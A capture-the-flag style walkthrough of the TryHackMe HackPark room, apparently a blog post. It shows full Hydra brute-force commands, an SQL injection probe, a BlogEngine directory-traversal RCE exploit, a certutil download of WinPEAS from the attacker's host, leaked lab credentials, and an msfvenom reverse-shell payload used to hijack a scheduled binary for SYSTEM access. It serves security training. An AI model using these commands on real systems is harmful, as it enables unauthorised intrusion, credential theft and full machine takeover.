HackPark | Advanced Exploitation | TryHackMe |

4 min readJul 19, 2023

In this room, we are going to be hacking on a windows machine by first brute forcing on its login page using Burp Suite and Hydra. We will also gain initial shell by RCE and gain administrator privillege by utilising WinPEAS , xfreeRDP and hijacking system binaries.

Brute Forcing

A look at the website we are presented an image of a crown who upon doing a reverse image search we find out he is Pennyworth. Lets proceed to log in

When presented with a logging page, start with simple password guesses, then proceed to test for sql injection techniques (‘ or 1=1#) if both do not work, brute force with hydra.

In our case, we are left with the brute forcing option.

To start with, lets connect to burp and grab the login request as shown below.

Using Hydra

To brute force for the admin password, we will be using hydra.

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form

hydra -l admin -P /usr/share/wordlist/rockyou.txt 10.10.179.73 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=MddBqpLN1hWr9bijpoWi2yEhYGX8TZy0VhEFHJuijaDDeluStBUEkreNat03ZMq0hfaIYNHjXR4O%2BI9oALpLR3RcE%2BQrTozslm%2FDOwBR3XAibZBZWu0%2BKYr4rxwXwgRfHTFhehzuDlDTweRPmIEgklaoALXWXPdtz34e4FM736SX4KDx&__EVENTVALIDATION=ZUizOr%2BTRWbOBq1aukdmu74Po%2BltFay13CfLhbPa4M2GlQHbrb4EOQ9orPrSAKatZVX1sSo03YgerRwMc2RfRkSZ8GlyWxPK070G6%2FLdvugFmTeq8z5x%2FOYy27k9m7Xt6ORHn%2Fxmj4LylOZ22fZbgJD0SkLt%2B4mjgW4fRlwM1kR7TgXS&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:login failed" -V -t 64

Bingo, we have the password as 1qaz2wsx . Time to log in.

Initial Shell

Now that we are logged into the admin panel, we can publish posts. But this is rather not enough information to go by, so we need to search for vulnerabilities to exploit.

A look at the website, we see BlogEngine Version: 3.3.6.0 which seems intresting. Using searchsploit or google search, we could find an exploit for this.

We got five possible exploits, but in our case we will use Directory Traversal / Remote Code execution.

Reading the instructions from the 46353.cs payload, we are instructed to save the payload as PostList.ascx.cs. Finally, the vulnerability is triggered by accessing the base URL for the
* blog with a theme override specified like so:
* http://10.10.10.10/?theme=../../App_Data/files

Now that we have the payload set, we need to upload it to the website and set up a netcat connection.

Bingo! we have an initial shell. Time to escalate privileges.

Lets cd to the public directory as we can upload/import WinPEAS executable here using the certutil command for windows.

certutil -urlcache -f http:ip:8000/winPEASx64.exe win.exe

Once winPEAS is imported, we need to run it. This will enumerate all the information we need to know about this machine.

Surprisingly, we have an administator user and their password revealed.

DefaultUsername: administrator

DefaultPassword: 4q6XvFES7Fdxs

We can use this credentials to log in with xfreeRDP

xfreeRDP

xfreerdp /f /u:USERNAME /p:PASSWORD /v:HOST[:PORT] /tls-seclevel:0 /timeout:80000

While running xfreerdp, you may encounter error: [01:13:56:893] [3974:3975] [ERROR][com.freerdp.core] — transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008],

Solve by simply adding /tls-seclevel:0 /timeout:80000

Bingo! now we have administrator access and we control his PC .

Method 2: Escalate privilleges by Hijacking system Binaries

Using winPEAS, we see an unquoted path where we can write and create files located in the C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])

Lets cd to this path C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])

In here, we need to look for a scheduled task that keeps updating and once we find it, we replace it with our payload set to the exact name.

Found it?

Using msfvenom, we can make a payload with the exact name Message.exe

msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=4444 -f exe -o Message.exe

Once the payload is created export it from your kali linux to the public directory in your target machine, meanwhile lets run our netcat at the same port we set our payload to.

We need to copy our imported payload from the public directory to the same directory where our mysterious service was running using the copy command.

copy Message.exe “C:\Program Files (x86)\SystemScheduler/Message.exe”

Should the copy be successful, we will get a reverse shell as System NT with all the administrator rights.